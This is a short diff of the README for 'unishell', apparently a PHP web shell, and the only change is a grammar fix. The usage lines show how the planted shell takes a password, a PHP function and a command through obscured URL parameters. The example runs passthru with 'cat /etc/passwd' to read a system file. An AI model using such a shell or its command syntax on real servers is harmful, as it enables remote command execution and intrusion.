Error996/unishell/README.md

 ### Usage
 `http/s://testing.com/unishell.php?ត=any&ល=password&ម=function&ប=command`

-**For example**, we want to show the /etc/passwd in the system so we use options us below:
+**For example**, we want to show the /etc/passwd in the system so we can use the options as below:

 `http/s://testing.com/unishell.php?ត=true&ល=ធិ៤០៤&ម=passthru&ប=cat /etc/passwd`